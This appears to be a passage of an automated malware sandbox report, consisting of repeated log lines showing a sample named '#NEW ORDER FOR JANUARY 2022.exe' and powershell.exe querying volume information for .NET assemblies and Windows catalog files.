                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
